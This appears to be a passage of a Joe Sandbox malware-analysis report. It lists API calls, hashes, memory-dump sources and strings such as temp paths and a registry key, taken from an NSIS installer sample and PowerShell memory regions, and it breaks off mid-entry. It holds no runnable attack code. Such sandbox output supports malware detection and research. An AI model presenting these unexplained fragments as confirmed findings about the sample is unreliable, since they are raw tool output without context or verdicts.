                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 3449924974-1876063424
                                                                                              • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                              • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                                              • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                              • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: c65051ea41094a3fe05cc1700b09eddc200d0413b9ca288990d93539fb52748e
                                                                                              • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                              • Opcode Fuzzy Hash: c65051ea41094a3fe05cc1700b09eddc200d0413b9ca288990d93539fb52748e
                                                                                              • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                              • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                              • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                              • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(formagen\Uninstall\frustulose,00000023,00000011,00000002), ref: 00402429
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402469
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402551
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseValuelstrlen
                                                                                              • String ID: formagen\Uninstall\frustulose
                                                                                              • API String ID: 2655323295-3782588226
                                                                                              • Opcode ID: e0ba1c3f19a560f8adc54ad1fb532bdf1398b76f1af8679a0db12c8548dab9a8
                                                                                              • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                                              • Opcode Fuzzy Hash: e0ba1c3f19a560f8adc54ad1fb532bdf1398b76f1af8679a0db12c8548dab9a8
                                                                                              • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-4083868402
                                                                                              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                              • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                                              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                              • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                                              APIs
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$Enum
                                                                                              • String ID:
                                                                                              • API String ID: 464197530-0
                                                                                              • Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                                              • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                                              • Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                                              • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                                                              APIs
                                                                                                • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D3A
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405DE2
                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405DF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: 0_B
                                                                                              • API String ID: 3248276644-2128305573
                                                                                              • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                              • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                                              • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                              • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 004053B7
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                                                • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                              • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                                              • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                              • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A00,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                                              • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 1100898210-4083868402
                                                                                              • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                              • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                                              • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                              • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CD3
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CE3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-1876063424
                                                                                              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                              • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                                              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                              • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                              • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                              • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                              • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 77fd41858859fe0b4c9e80e72eec6cecd4d2f18d98bcabb8469c096a21ed3f50
                                                                                              • Instruction ID: fecc16614830334c4278aefb69a8822e1ed4c15591d4512f1540ff43de0ebeee
                                                                                              • Opcode Fuzzy Hash: 77fd41858859fe0b4c9e80e72eec6cecd4d2f18d98bcabb8469c096a21ed3f50
                                                                                              • Instruction Fuzzy Hash: DE528D34A00319CFDB64DB64E854BADBBFBBF85204F1440A9DD06EB254EB309986CF56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (fl$(fl$4l$4l
                                                                                              • API String ID: 0-1123208215
                                                                                              • Opcode ID: 6fb23a32c0a603d5f651c1a4cf54ea47b77907a01b52bbd7e5df45c844654b23
                                                                                              • Instruction ID: 976ecafff4ba9910bd58b53ab4058d94615dafa2da6a4971509c2e9a67676536
                                                                                              • Opcode Fuzzy Hash: 6fb23a32c0a603d5f651c1a4cf54ea47b77907a01b52bbd7e5df45c844654b23
                                                                                              • Instruction Fuzzy Hash: CE921CB4B003189FD724DF94C850BAAB7B2AB8A314F10C199D9096F795DB72ED81CF91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (fl$(fl
                                                                                              • API String ID: 0-1194790885
                                                                                              • Opcode ID: d498a0b426afd49919033a235ede59272d2f1c3aa096a12bc1770e67e3334881
                                                                                              • Instruction ID: 4ddd1f4ae2e3e0ab09b870917339f7c8f9537cfd7144037fd7ac3301b73e180c
                                                                                              • Opcode Fuzzy Hash: d498a0b426afd49919033a235ede59272d2f1c3aa096a12bc1770e67e3334881
                                                                                              • Instruction Fuzzy Hash: B7A26BB0B10214DFD714CFA4D454FAABBB2AB8A314F248169D9056F786CB72ED42CF91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
